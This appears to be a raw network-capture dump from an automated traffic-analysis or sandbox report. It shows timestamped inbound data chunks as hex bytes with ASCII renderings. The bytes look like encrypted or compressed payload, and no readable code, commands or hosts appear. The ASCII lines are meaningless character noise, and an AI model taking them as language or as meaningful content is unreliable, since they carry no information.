                                                                                                                                  2022-01-11 22:38:59 UTC1024INData Raw: c3 c1 97 fe 78 c1 6d d5 8d a8 96 8d 71 be 08 9a 63 1a 3e bf c3 51 7d 9f 82 f9 65 58 7b ad 83 5a 43 c2 97 13 80 8f 5a 7b fc fd 3f 3e d2 9d e7 64 34 51 1b b5 3e 8b 4e 13 e3 e5 35 77 f8 7e db f1 b4 18 86 8e 97 62 4a 78 17 b6 4c 20 d1 15 fe 29 ee ec 02 b8 e3 88 0b 37 37 61 d8 58 c2 90 42 37 d6 69 1a 36 96 2c ab 8f a1 61 fe af 12 25 a4 dc 02 fe 55 ff a6 90 e5 27 3f 2c 88 16 c1 3e 26 8d 02 af 30 48 15 e1 46 92 11 a3 2e 6f a1 26 c6 68 0f 58 59 6d d2 72 f6 54 ae 13 bd 6d df 74 52 ee 99 ca cf de 7c bc 50 73 99 92 9b 92 3b 47 9c bc 39 32 6a 6c 1d 3e 5b 5f 43 fa 3f 38 00 f1 e0 09 02 ef d8 da f7 49 05 e7 58 f5 89 4e 3a 19 47 d9 d4 b6 c5 d3 89 81 65 7d 53 2c a4 02 6a 65 a9 58 67 22 cf a2 ee e4 c7 c9 2c dd 30 6e 79 60 e8 75 e8 d1 e0 5c f5 88 fe 4b 5f 3f b6 ef b5 56 d3
                                                                                                                                  Data Ascii: xmqc>Q}eX{ZCZ{?>d4Q>N5w~bJxL )77aXB7i6,a%U'?,>&0HF.o&hXYmrTmtR|Ps;G92jl>[_C?8IXN:Ge}S,jeXg",0ny`u\K_?V
                                                                                                                                  2022-01-11 22:38:59 UTC1031INData Raw: ec 07 8c 3a 0c 3f 14 8a 23 88 25 2f b8 4e ee 40 e5 6b 8e da 27 f5 99 bf ce bb 7b eb a4 66 b6 00 bc e8 51 65 b8 5b 02 92 95 20 62 9d e7 b6 97 49 db 45 87 a5 0b 7b 10 f8 bd ea 7f c0 c1 f4 ac ec 9a 25 25 d8 b2 9d c6 7f ae ec ed ff a1 08 60 bd bc 0c 79 43 a2 bd 30 4c 0c 88 a2 2d d8 92 c3 17 ca c2 e3 9d 2c d6 26 e7 c0 c6 0d f3 0c 19 82 09 33 0a 5a 14 1e 00 c0 12 3d 16 13 53 fa 67 90 dc ed d5 a4 56 6f 70 b0 67 e6 42 67 71 86 b4 4f 68 3a 80 28 ba 0d 8a 28 40 0c 7c 0d d0 59 53 f3 16 40 31 ee 3a b4 b3 b1 2a ef 92 2e 83 03 df 3a d6 0a 37 16 2d 4a 4c b8 f8 60 99 bc 5d 1c e5 f2 a2 48 c0 d8 7b e2 40 d8 2c 7f eb 88 20 90 66 a8 d2 4a 48 eb 60 40 99 db 5e ec aa 73 00 ba 57 cb 1b 53 97 37 35 c8 f8 d8 8b c3 cf 91 d9 af 3a 15 71 12 e9 52 66 b2 21 6e ee b5 09 e5 8a 5d 6f 03
                                                                                                                                  Data Ascii: :?#%/N@k'{fQe[ bIE{%%`yC0L-,&3Z=SgVopgBgqOh:((@|YS@1:*.:7-JL`]H{@, fJH`@^sWS75:qRf!n]o
                                                                                                                                  2022-01-11 22:38:59 UTC1039INData Raw: 38 9c fa b2 3e 12 4c d3 b1 7b 73 bf cb 21 a9 4e 37 32 29 57 f0 9f fa d3 31 f2 65 9e 30 08 33 7c b0 3d c8 bf d6 e7 9f 3b c8 32 20 6a db a1 fb 4c 87 e7 ad a1 c7 65 80 01 bd 28 1b 7b 62 3a 71 c6 28 e6 09 03 da e6 65 a2 c3 97 58 7b 7f b3 84 e6 d6 a3 13 c8 e0 7f 4b 8f 4d ff ff f2 98 37 db fb fa 7d b6 4a fd 12 4c 90 7e 26 8d 81 cc c8 3c b5 c3 d3 8f 10 5e 3e 11 60 35 87 25 4c d7 67 69 b4 11 d6 45 2f ed 22 9c a1 cc 3a 58 d1 10 0c ae 8e e3 92 71 a8 77 b6 8a 6c e5 d7 08 4b bd a0 f6 6c 3f bf 2f 76 c0 80 a8 69 25 17 cc 33 ca 18 14 84 34 d5 ad ac 7f 9e fa 28 9d 99 15 5a fd 7b c2 7c 99 2e 98 60 e9 41 8b fc 63 7e 7f fd af af 7e f5 2a 7e 67 28 f6 e7 e4 4a 72 7b 72 24 52 71 db 6a c9 61 10 a1 73 df 0d 3d b0 d7 4c a6 e4 8c a3 e4 b5 81 c2 da 80 74 cc bc e2 66 23 4c c8 af d7
                                                                                                                                  Data Ascii: 8>L{s!N72)W1e03|=;2 jLe({b:q(eX{KM7}JL~&<^>`5%LgiE/":XqwlKl?/vi%34(Z{|.`Ac~~*~g(Jr{r$Rqjas=Ltf#L
                                                                                                                                  2022-01-11 22:38:59 UTC1047INData Raw: 35 bb 7d 0c 4a f6 3e fd bb 31 62 46 e6 fe 3e 71 d9 38 d9 ba 3a 7b 08 98 ea be 25 25 79 9c 65 41 d6 af e9 49 f0 c0 6d 5f 95 2f 3d 0b a9 b5 04 95 e5 c6 fb 31 ee 85 07 5d ab 62 0a 3c 5c a5 84 34 58 b4 56 1d 20 22 b3 8f 5b 41 15 41 42 78 28 12 44 84 b1 a3 c0 ac 59 16 b2 ea a9 1a 75 ad f5 12 bc b3 f5 25 03 95 7c f0 40 b5 8a cc 62 b9 0c cb 05 e5 23 80 cb fa 98 91 bb f2 a0 ba 9c 11 f5 78 51 32 80 5c 8e ac 5e f3 cc 0b c7 09 96 1f 6c 2b 1b 85 a5 9a c9 25 eb 4f b9 eb d0 cd bd c7 76 51 64 b4 88 06 5b 14 a3 27 1e ef 7e 13 9c ba 5a b5 d4 ba fd 03 94 ee 58 24 82 db 0f 54 63 36 a2 51 28 f1 44 48 db da 57 b7 ec b0 be c5 27 de 4d 4e a7 76 f9 90 9d 9d 31 b2 79 2c f4 bb 0e 23 3f c0 d2 5b 2a 69 aa 48 81 a4 d3 e7 6d e2 6d 02 e0 2f 47 67 be 60 10 b4 68 87 09 d2 c5 33 fa c4 2d
                                                                                                                                  Data Ascii: 5}J>1bF>q8:{%%yeAIm_/=1]b<\4XV "[AABx(DYu%|@b#xQ2\^l+%OvQd['~ZX$Tc6Q(DHW'MNv1y,#?[*iHmm/Gg`h3-
                                                                                                                                  2022-01-11 22:38:59 UTC1055INData Raw: 11 96 40 80 92 52 0e d2 ca c6 9e 65 f0 f3 42 ec e7 6a 07 5a 95 81 49 d2 3b ad 78 8f 2b e7 f1 0f d4 89 a0 85 62 5a 26 c8 c0 54 d0 77 bb e9 a7 16 65 90 8c 3f bd f4 22 38 af 65 37 48 ee 24 5a 91 41 12 6f 22 ee 7c 91 ad 7c 17 02 ee 55 d5 17 97 9f 53 23 5b bc d7 a5 86 07 af 83 f2 d9 17 de ad e3 ab 50 69 9d e4 3b 61 42 e8 60 87 14 81 2b 66 0f 83 52 4c 3c 3d f4 3e 05 f6 6f 6c ef fb bc 88 4c 49 5d 34 30 db a2 61 5d ec c1 f9 77 2e 44 db b8 2a f3 15 52 ab 3f 05 d4 30 bb 66 c0 01 28 06 17 83 3d ec 4a 86 57 87 9c d9 89 0d 1a 19 86 d0 9a 99 62 f1 41 0e ec be 92 a4 8f b5 ee b0 50 92 09 9a 0b 3e 7f 6c 7e 45 2c 0a 2e 89 bd ce 5e 98 e8 1a 11 e8 56 b7 f0 ea e3 1c b1 15 8c 00 1c 55 ac 63 1b a1 69 78 3d d3 e8 0c b1 1e 88 3d 32 06 3b 34 be f0 17 69 96 6f a9 25 0c df 4a 2d 66
                                                                                                                                  Data Ascii: @ReBjZI;x+bZ&Twe?"8e7H$ZAo"||US#[Pi;aB`+fRL<=>olLI]40a]w.D*R?0f(=JWbAP>l~E,.^VUcix==2;4io%J-f
                                                                                                                                  2022-01-11 22:38:59 UTC1063INData Raw: c2 4e 8a 69 9e 3f 82 70 40 a6 3c 17 97 00 7a a4 f9 aa e6 2d ab ad cb 70 ff 0b fe f0 e2 08 a9 31 46 b6 cd 1a 15 20 f6 6b 25 37 5a 7d 2d cc 94 29 e7 d5 a8 68 5f 94 c0 74 1c 3a 0c 36 d3 fe 39 51 8c b4 dd f5 03 8a e3 cc 58 2e a5 a9 35 89 9e c6 5d f3 0f 12 46 b8 b1 df a7 b8 c1 49 df fb ac 95 63 1a 5f bf 47 9b f0 e5 d3 f6 0f da 72 8b 4e 27 56 8d a0 32 73 f3 b4 94 f3 19 ec c2 00 c8 f2 fe d0 f2 78 87 97 87 73 f8 2f 41 5e 35 a8 91 38 2c 46 20 7f 7c a7 d8 81 9b 2b ab 58 37 23 a1 af c1 2d 54 44 c1 fa 83 ca 37 ce 1c 61 f3 9f 2f 78 b1 17 65 3d ef 4b 3c 2b 46 12 48 9a aa 2e 6b dc 50 57 e4 e2 27 57 e0 18 58 61 11 5f 68 25 c8 5d 44 85 bb 63 70 df 93 dc 70 25 2b 80 d1 ad 50 a1 9c b9 29 6f 11 0e 60 ff d8 83 3d a2 d9 27 68 2b ec 40 a8 a0 15 0d 69 52 e4 6c dd 96 9d 01 a9 3d
                                                                                                                                  Data Ascii: Ni?p@<z-p1F k%7Z}-)h_t:69QX.5]FIc_GrN'V2sxs/A^58,F |+X7#-TD7a/xe=K<+FH.kPW'WXa_h%]Dcpp%+P)o`='h+@iRl=
                                                                                                                                  2022-01-11 22:38:59 UTC1071INData Raw: 16 64 8c 67 55 d7 c3 37 c7 de 22 94 32 02 4d 0a 14 48 45 66 d4 9d 13 c9 83 bc c0 95 a0 92 d0 e4 e8 32 1e 83 a8 3b f3 7d 0f 2c 83 ad 55 be 19 a9 69 f0 1d f2 a3 05 1e 7e a5 91 51 e0 fa 5b d6 b9 00 ef 24 8d 2e 68 6b a8 4f f9 1e 91 c7 d7 ba 2f 7f 0a d9 0f e2 07 4f 6b 38 b6 2a 0e 6d 4e 09 d7 68 e0 cb 2e db 49 0f f2 00 dc 15 bc 29 ec e5 c8 c0 2c 01 71 39 be 4f 94 11 4d a0 fb 30 b2 da 79 b3 2a af f8 3b ac 5f cd 43 a6 2f 56 2b 61 4b 82 b1 60 33 cd 43 ee 75 39 6b f9 b2 90 47 a0 7d c0 68 85 7a a6 92 37 a4 d1 22 6e 7b 2d b4 c1 af 1b 16 e4 aa 38 18 cd 23 35 51 50 fd 44 b1 61 5c 9a 6a 00 b5 cb 7d c2 15 66 30 8a d1 30 78 33 b5 4a 71 93 20 4c d7 17 2a 7b d5 d8 26 65 d3 8d 38 6f e4 11 e1 fb f3 4f be 91 04 e4 55 45 27 40 76 ed 84 38 76 10 19 a1 f9 e4 fc e8 c6 4a 3a 0d 77
                                                                                                                                  Data Ascii: dgU7"2MHEf2;},Ui~Q[$.hkO/Ok8*mNh.I),q9OM0y*;_C/V+aK`3Cu9kG}hz7"n{-8#5QPDa\j}f00x3Jq L*{&e8oOUE'@v8vJ:w
                                                                                                                                  2022-01-11 22:38:59 UTC1078INData Raw: 23 cd dc 7a 27 0a 56 71 9a 16 31 57 a9 ae 29 3e b6 f4 5e 92 16 cb d4 c6 b8 1b 57 9c bf b0 76 53 b4 aa a8 77 2b a1 43 f2 2d ac d9 28 0d 02 a2 04 d5 eb 74 7f 20 63 22 76 03 0a a7 de dc 53 3e 61 e1 15 1f a0 db 89 e9 af 12 ec 3f 4b 1b 6f 60 95 1d 11 73 e5 48 4b 84 62 a7 ae 2e 99 ab 8a 17 0c dc f5 f0 6f 9f cb be da b7 dd ff 1c bd 7a 84 7f d9 6f ea 8c 76 be 32 4b 41 cb 91 57 83 5d 4e 49 a6 60 cb db df 20 7d bf ef 7b c6 d7 d6 32 89 00 f6 b0 99 e6 5f c3 95 08 60 48 e3 f0 8d 33 34 57 98 53 35 c7 21 1c d1 f7 91 0a ba 63 bf 2f b4 6d 62 69 d3 c7 f4 97 62 c2 a3 68 d6 e7 78 e9 e4 73 0b e9 c2 eb cf 45 e6 e5 be 6c 07 f3 1b f1 7c 74 f1 50 1b 56 77 d5 ae 70 95 b8 ba de 1f 50 47 fe cb 55 fc da d6 9b a6 fe 13 fd f4 5a cd a8 da 50 e6 f0 7a 17 ae f8 df 3e 99 83 ad a0 59 35 bc
                                                                                                                                  Data Ascii: #z'Vq1W)>^WvSw+C-(t c"vS>a?Ko`sHKb.ozov2KAW]NI` }{2_`H34WS5!c/mbibhxsEl|tPVwpPGUZPz>Y5
                                                                                                                                  2022-01-11 22:38:59 UTC1086INData Raw: 4b 07 4f d5 4f 21 b4 28 41 b8 a8 0c 12 73 d8 ba 84 98 ae 08 04 5a a5 d4 46 92 d1 ea 0b 03 79 e0 b8 04 76 12 b0 c8 4e 19 f0 fc 6c 73 25 5f 61 8e ae 7a 14 89 07 a3 d1 dc 34 53 1e f9 69 b5 18 86 e6 67 c1 13 22 e7 66 8f 7a fc 46 5c a5 4b d1 22 3a c9 c1 4c ea 35 53 c3 42 05 6a 84 79 24 17 bb b1 88 0b 2b d4 87 87 03 bc 08 7f 65 bc 4c f5 83 6d 61 2f 6a 36 4b f3 df ec 94 b8 91 0a c8 77 6f e3 7b 71 31 92 3f 35 a0 b5 7f 0a 0c 22 cc 07 ae b9 9d 4c d9 24 54 db a5 8c 65 5f 0c 64 92 ab 14 1b 48 16 36 97 b8 c0 2e 43 65 9e 42 89 22 d0 4e 2a 4b 68 0e 23 f1 93 72 bd 2c 69 6a 61 58 c2 d3 39 b2 d0 e2 54 e0 7d b3 05 18 2d 38 ab ba 7c 49 e7 a0 0b 71 b0 ab d5 df 4b 56 0a 14 14 b5 4f c3 b7 64 20 10 56 c5 fd f3 ef 62 ce 43 e0 b7 84 21 1f d5 3f 76 7d d2 e5 06 18 13 df d2 01 45 73
                                                                                                                                  Data Ascii: KOO!(AsZFyvNls%_az4Sig"fzF\K":L5SBjy$+eLma/j6Kwo{q1?5"L$Te_dH6.CeB"N*Kh#r,ijaX9T}-8|IqKVOd VbC!?v}Es
                                                                                                                                  2022-01-11 22:38:59 UTC1094INData Raw: f6 6b 37 13 35 4b a7 e3 25 f5 f4 51 6b 2b a2 4f 61 32 e1 f8 1b 50 95 e5 d1 18 c1 7c 43 54 91 70 35 34 54 50 ef b2 f7 88 37 65 63 5c ab 48 a0 86 39 4f 44 95 7b 94 76 9b c3 17 dc 2e 41 ea fb d4 34 50 d9 19 81 df fb 39 aa 5b cd 26 e1 58 03 46 7a 6e 10 8b 56 8b c7 29 83 3e 1d 27 d5 a5 44 4a 77 8a 3a e3 57 e9 d1 68 7e b2 5b ad 92 f8 45 ec b7 9b 9f 32 f6 7f 09 22 f2 87 9d 31 b3 b8 a1 c5 56 dc dd 78 76 19 ba c7 95 a4 a5 d2 93 cf 1a e2 31 73 d4 28 cc 2a 80 48 ca aa de 87 35 b2 21 48 27 bc 8c 2d 31 21 47 3e 16 b4 6e 15 83 a0 e4 fe 5d 1d 5e 35 1b 55 a5 5d d1 cf 4c f0 ed ed 47 e1 3f 7e 25 60 9a fc f3 a4 50 53 73 31 f2 a5 db ba 99 a5 0c 31 69 d3 e6 a3 77 4f 4b 36 37 4f ba a4 1c 4d ca 99 96 fc ae db 64 f9 8b be 0d 96 b0 08 b7 0e 53 8a 40 1c 1c 5a f6 a0 46 47 ac 52 da
                                                                                                                                  Data Ascii: k75K%Qk+Oa2P|CTp54TP7ec\H9OD{v.A4P9[&XFznV)>'DJw:Wh~[E2"1Vxv1s(*H5!H'-1!G>n]^5U]LG?~%`PSs11iwOK67OMdS@ZFGR
                                                                                                                                  2022-01-11 22:38:59 UTC1102INData Raw: cd a1 b4 58 23 1c 96 a5 77 7f 0b cd 8a c4 74 6e 49 4b a6 ae f7 95 6f 6b 33 ee d7 6a 1f 99 2c fa eb 19 2d fb 24 7a bf 10 20 90 0b 03 4d 6f 45 7a c1 d7 f2 1e 46 a6 56 25 7c 32 f5 6e ef d6 2d 27 2a 46 07 34 e5 45 04 0b 50 05 75 27 53 5f 59 c5 76 57 65 1a 09 91 44 0c d3 d4 3f 2f 6e e1 63 47 73 3f 94 bd 10 cb eb d9 33 40 44 7e 17 96 8d 11 ea 9f b1 28 e5 f1 b2 5d 32 81 3d f9 8e 81 5f f9 45 c1 25 24 81 27 bf 1c d3 a0 98 d6 b6 7a 20 37 42 66 f6 1c 0e d9 72 dd 25 de a9 04 2a c0 37 d9 d1 3f 3e 90 f3 8d f4 d7 38 57 bf 56 ff 7c 5f 36 16 65 d3 23 a9 12 93 2a 31 b7 10 7c ef 4c da 41 98 be c2 46 d0 78 19 0b 08 aa 4b 83 a6 96 4e d8 71 ee 68 90 7a bc 70 71 f8 c2 dd 6c c7 0b 44 f3 0c bd 58 df 0c dd dd 69 e9 9c 55 b1 f8 03 a9 09 c3 f0 2f 85 a9 ab ab ce a3 0e 8c 0b f9 47 8b
                                                                                                                                  Data Ascii: X#wtnIKok3j,-$z MoEzFV%|2n-'*F4EPu'S_YvWeD?/ncGs?3@D~(]2=_E%$'z 7Bfr%*7?>8WV|_6e#*1|LAFxKNqhzpqlDXiU/G
                                                                                                                                  2022-01-11 22:38:59 UTC1110INData Raw: 15 ed cf 46 46 05 24 6b 41 d4 62 62 a4 de cb 29 bf 6f 9e 3c fd 9a 25 17 b8 79 81 ca ba d0 2e 72 7b ee d4 35 3b 2f c9 09 57 d9 29 39 db 4e 53 87 61 7d c9 fb e2 a8 f7 7b 4c 96 6f f0 49 72 6b 8b 0c d2 1e b7 e9 ba 2c 4b 61 b3 d6 95 95 2a f9 22 23 e5 80 f6 a0 2e 0d 9f 82 c8 b0 87 4c c4 8f 94 ab 12 70 cb e2 f0 90 7a c0 87 55 5b 7a 0e d1 af d0 56 c7 bf e8 71 31 9f 08 ec 65 45 82 26 0f ef 35 81 41 33 49 e4 0a bb 41 a5 cc dd c3 34 81 fc 02 5a e7 38 3a 12 57 d1 13 19 bf 2b 0d a8 9a 40 d0 e6 92 26 56 6b 47 d0 ce 5b 25 e6 ae 26 35 bd 36 e8 87 ad 49 8e 4f 62 60 cd 85 ab 46 93 89 eb ed 35 62 21 69 6e b0 97 7b f0 dd 77 46 74 2f 20 63 2c 7d 0b 9c 24 81 f7 e0 43 61 7e 6a a9 39 c2 2c f7 b7 57 ae d8 0c 52 0b 8e fd 20 ca e7 72 08 39 4a c9 ef 41 77 38 97 e0 18 0a 6a 4e 13 44
                                                                                                                                  Data Ascii: FF$kAbb)o<%y.r{5;/W)9NSa}{LoIrk,Ka*"#.LpzU[zVq1eE&5A3IA4Z8:W+@&VkG[%&56IOb`F5b!in{wFt/ c,}$Ca~j9,WR r9JAw8jND
                                                                                                                                  2022-01-11 22:38:59 UTC1117INData Raw: 8d 6a f9 0f 79 52 7a 14 70 15 dd 02 04 29 2c 15 05 05 d8 60 7e 43 1c 48 9a b1 33 c0 8f 5b 90 3d 19 0a cc 15 4d 29 a6 9e fe 77 0b 53 35 77 9a 09 f0 1f cf 44 11 fd 5c ea e9 9f 85 d5 8d 31 03 7a c1 68 05 24 ff 13 a3 bc 77 ce 58 b1 60 ad cc f0 76 7d a6 37 8f 1d 33 cf a6 61 94 00 df 21 c9 b9 9f 87 0b 38 1c 18 65 89 25 15 ce c9 61 3b 82 37 da 7a 64 43 7b d8 ec 15 34 49 da c1 1b 96 79 10 aa c7 bd a4 b0 4f cc 22 7f d1 f1 71 58 07 83 2d 14 ce 78 fa 9e 3f 9d d9 a3 a6 41 38 8b 8f 17 d0 46 42 da 85 a2 e2 21 62 36 07 8b 8a 63 c8 e6 ea 1c 27 fe 63 30 d3 eb d9 8c d6 9f 2f 88 d1 aa 71 69 7a 0d 46 38 8d c7 6d fe 14 ec 48 98 e5 d3 ee da e0 a7 86 09 45 60 f8 b8 27 dd 43 a7 c5 cb d1 66 4e d3 3e 9e 61 d8 01 88 fb a4 0d 3c 52 c3 3d 55 10 4c 84 34 99 04 c9 f8 9c 79 ee 95 43 b9
                                                                                                                                  Data Ascii: jyRzp),`~CH3[=M)wS5wD\1zh$wX`v}73a!8e%a;7zdC{4IyO"qX-x?A8FB!b6c'c0/qizF8mHE`'CfN>a<R=UL4yC
                                                                                                                                  2022-01-11 22:38:59 UTC1125INData Raw: 6f 33 ad b9 a9 fd e0 df 46 03 9b 63 60 1f 94 69 ea 80 f3 5e 8a b6 40 24 ba c0 13 93 67 70 ae 2e e1 0c 81 70 d4 c9 eb d9 62 64 6c 17 ce 95 70 d7 4d f7 0a 20 38 63 85 6b 28 0d ed e9 80 65 3e 62 6e e3 42 57 f7 ff eb 39 fa 37 af 90 84 20 4e 67 5e d9 32 13 a1 03 df 7e e6 67 25 65 d7 43 38 d6 3d 39 92 66 e3 f9 02 3e a8 98 f4 da 51 45 7b 10 d5 c2 3c ca 51 cb 46 66 69 61 dd 59 04 0c 28 01 7f 3c 94 c1 a2 cf 72 b8 72 40 da 8f 31 72 80 90 17 82 6b 9b b6 61 30 ae 99 6d 65 1a 1e 50 64 cd a8 ea e9 1e 61 25 be 46 46 e8 63 f9 a8 09 67 0e 94 70 42 98 e4 15 aa 05 27 ef 54 7c 69 ee 30 ff 4b 62 0b bf 20 95 6c 36 07 f3 3a 03 97 40 e8 6f a2 0d 6f 08 63 85 a0 ff c4 8d 63 fe 7f 63 c5 e4 fa 6f 82 77 34 c9 54 09 05 0e d8 82 36 70 ee ee d6 5b e3 2e 25 99 8c d7 91 90 c6 86 45 7b 16
                                                                                                                                  Data Ascii: o3Fc`i^@$gp.pbdlpM 8ck(e>bnBW97 Ng^2~g%eC8=9f>QE{<QFfiaY(<rr@1rka0mePda%FFcgpB'T|i0Kb l6:@oocccow4T6p[.%E{
                                                                                                                                  2022-01-11 22:38:59 UTC1133INData Raw: 29 29 5e 04 8f b4 35 f3 8c 89 78 8e 24 b6 49 2d ea 84 f3 e5 2e e9 1e d3 7f 68 af 0d 1e 11 d3 5e ec 04 b0 7d d6 8a d1 fe 25 6f c5 5e 6d 4e 50 aa 89 5f bd 0f 3c 7b 3e 5a 9b fa 59 71 45 7f e4 4f 80 0a 3f 41 00 3e f4 07 8e 50 6b 5e 82 8d 36 b5 85 39 ed 30 d2 1b 0e e7 13 7d 47 bb 18 e5 9e b1 e8 f8 17 16 14 05 1d e3 7f 11 25 c5 c7 13 8e f0 2f ee d7 ca 18 6e 46 17 cd c8 c8 57 9f 17 5b c2 65 46 d5 63 94 90 e5 85 f2 71 3d 51 c9 85 45 f4 6e 77 c2 90 45 6d 1c 0f 6c 73 5d 8f ed 55 3f 87 29 1b 16 15 c7 d3 b4 7f 35 1b d7 7c db f6 fa 8c 0f 43 f2 3e 70 5c 4d 1c 0a 33 77 86 b0 b1 aa 4f 0a 71 24 94 47 8d 88 98 2d 9a aa f2 20 af e0 1b 02 22 cd 94 aa 80 3b 22 12 0d df ac da 9e ec 79 6b 99 51 0f 9b 3f 08 1d ac cd a7 a5 b7 18 7c 7c ec 64 e4 32 25 0f 44 42 64 35 92 95 be e9 9a
                                                                                                                                  Data Ascii: ))^5x$I-.h^}%o^mNP_<{>ZYqEO?A>Pk^690}G%/nFW[eFcq=QEnwEmls]U?)5|C>p\M3wOq$G- ";"ykQ?||d2%DBd5
                                                                                                                                  2022-01-11 22:38:59 UTC1141INData Raw: f3 bf f3 af 07 15 b6 3f f8 ab e0 d6 6a 7a 4f b1 4e 58 44 b7 f0 f6 d7 59 b2 40 be 20 fe 08 de 66 8f 97 8b 98 e7 e6 47 71 6b 2f 5c d0 c4 8d 30 50 84 7d db 92 eb f8 d3 dc 6c 09 21 f5 ef 31 5d 6a 01 9c ca e8 5e f2 21 79 f4 34 9f 00 02 62 56 91 11 e8 4b 5b 38 ea ea d0 4a 17 5a 86 da 79 29 61 2d 34 95 05 f8 0e 8d e0 83 d9 5f b2 c4 b0 e7 2b 45 ff 3e 42 62 b5 c6 4a 4f be 98 d8 60 0f 13 a4 f9 d5 51 f8 a0 55 16 db a3 6a d3 e8 0f 0d 4d 83 19 ca c4 91 f7 a7 fa d8 46 ca db b5 eb 80 e1 81 ff 38 0a 7a 3c db f8 87 6f bb a8 2e e2 73 61 d9 a2 91 ea f8 01 e0 54 b3 48 d0 3a 7e 5a ba 64 da fc 7f 8e c5 58 46 2e 86 71 39 a9 04 4f 93 ad f0 52 66 d0 60 d7 41 d3 7c 59 d1 d9 0a 32 41 42 0c 71 de b9 38 a2 f2 da 28 31 98 0d e9 63 ed 66 3e 4b 66 70 d6 0d ca 61 76 95 1d 10 36 5c 90 cf
                                                                                                                                  Data Ascii: ?jzONXDY@ fGqk/\0P}l!1]j^!y4bVK[8JZy)a-4_+E>BbJO`QUjMF8z<o.saTH:~ZdXF.q9ORf`A|Y2ABq8(1cf>Kfpav6\
                                                                                                                                  2022-01-11 22:38:59 UTC1149INData Raw: ae f9 ac 3d c1 87 95 02 27 35 38 f4 a5 58 02 52 bd 5d 42 a7 89 96 07 42 27 aa fb a7 d8 9c 85 6a 23 ce a4 2f 8c 77 38 1c 8d 28 59 ce a6 92 31 0b 28 ae 74 13 dd 9a 93 84 28 e1 29 98 b8 7a 74 f1 b2 2d 63 46 1e 89 00 f2 a9 62 72 4a c2 3a a2 39 72 32 0f 6c 85 af 67 12 cc 86 84 cd 1c 99 56 ec 74 35 f0 78 35 37 ad 84 54 b2 28 76 68 9a 14 56 38 8a 2f b4 bd e4 f7 dc 27 08 f6 4e b2 81 57 43 a5 ef ca 1f 0f 3f cc f5 f0 89 f7 ec d7 17 b7 0b f6 23 eb af e0 3d 47 18 32 9b ec 0a 1f 74 eb cd 63 20 f6 01 2b cc c9 e8 8c e8 0b 76 3c e4 5e 17 8b 34 28 a7 95 79 d3 fc c4 6f 45 29 97 90 fa 32 12 ab 38 cb aa 5d 7b 7e 6d cc 36 d3 fd f4 d7 1a 32 3a da 75 3e 10 3f 1f 73 e4 bb 07 9f 60 aa 1d 43 a5 66 18 33 33 aa 10 dc 52 23 a8 17 fe 9b a1 9e 75 39 e9 3b 73 aa b4 1a b5 ea 81 f4 48 fa
                                                                                                                                  Data Ascii: ='58XR]BB'j#/w8(Y1(t()zt-cFbrJ:9r2lgVt5x57T(vhV8/'NWC?#=G2tc +v<^4(yoE)28]{~m62:u>?s`Cf33R#u9;sH
                                                                                                                                  2022-01-11 22:38:59 UTC1156INData Raw: c1 3c 83 cf 3f 41 66 d8 d9 8a a3 70 17 ce a1 94 15 13 83 ae 0b f6 d9 0f d9 0b c9 c1 f7 a3 07 71 fa 40 ad fc 72 89 46 d3 44 24 c1 8c 8c 73 5c 3e 2f 8e 0b f9 4e bc 5c bf ed ea 2e 11 a6 93 77 65 c2 e5 54 72 5f f9 58 a1 34 af f4 0b ae 76 f5 26 34 98 35 f3 d5 d2 70 f9 15 f8 4b 3c 53 26 48 76 d5 f0 0f cd f0 ce e2 21 c0 a8 e1 65 97 cf ef 14 0f ef f6 29 95 bd af ac 68 db 6e a2 40 e3 43 64 4a 01 91 e6 de ae ad 8a 2e 7c 1b c6 70 1c cc bc d9 6f 3e 67 0a f7 c4 0e c1 e6 0f 74 47 41 89 3b c1 01 f9 32 d7 6a eb 8e 47 ab f2 8d 56 4c 88 99 2a ea 82 e4 7e 1b 19 3e f4 23 f9 8b 54 58 6d 49 ab f9 2b 82 03 96 b3 7d 0c 69 8f 96 c4 22 20 3b fb f9 73 1f 31 92 cd 08 38 7b 4b 5e 03 2a 04 83 b7 aa 98 01 46 64 1a 76 e6 d8 e3 b2 b0 6c 57 2d ff 4c 73 48 4e a0 a9 41 5f 16 72 a2 c1 72 b6
                                                                                                                                  Data Ascii: <?Afpq@rFD$s\>/N\.weTr_X4v&45pK<S&Hv!e)hn@CdJ.|po>gtGA;2jGVL*~>#TXmI+}i" ;s18{K^*FdvlW-LsHNA_rr
                                                                                                                                  2022-01-11 22:38:59 UTC1164INData Raw: 7a fb 10 bf 4f 1c 7c cd 5c db ca 3a 68 57 34 10 40 b2 a8 5a 84 12 09 7a fd f9 97 44 20 1e 40 05 5a 63 58 ea 33 4d 7b f7 37 de 85 3b 12 4c bf 7a db 49 f7 f6 4a 9c 5d 2e 3f 0d 29 96 b7 52 94 e2 e3 20 ea 8b 96 2a 6c 51 f4 0a 65 db 26 79 e7 08 3f 37 1e 6d fb b4 a6 bd ca 39 fb 14 ed b1 69 bb 16 b9 63 0c e0 e9 18 61 03 84 af 45 51 d1 49 c0 4c 3e b0 83 71 bd 2f 77 6f 36 00 63 ae 10 18 5c ba 5c 43 05 6a 67 ff 3a 20 82 3b 79 cb 3f 40 11 f3 19 bd 0f e0 5b 7b bd 22 dd 42 2e 9d c1 20 60 e5 dc f3 2e e5 5f 24 ae c9 2d c7 f0 43 fb 0b 53 b8 b8 0c c7 6d ab 1f 24 80 d6 79 1a d4 59 85 16 93 9b e9 a2 19 bb 4f 91 ad 4a 81 f9 ef 0c 1b e3 91 32 c2 7d 7d 42 c2 06 ad b7 3c 91 cb e2 c1 90 cf 4f bd 0b 90 23 e0 1b 7c d8 52 4a 98 38 d3 04 0d a4 d6 54 7e af d8 93 e2 7d 82 10 bd 9e 13
                                                                                                                                  Data Ascii: zO|\:hW4@ZzD @ZcX3M{7;LzIJ].?)R *lQe&y?7m9icaEQIL>q/wo6c\\Cjg: ;y?@[{"B. `._$-CSm$yYOJ2}}B<O#|RJ8T~}
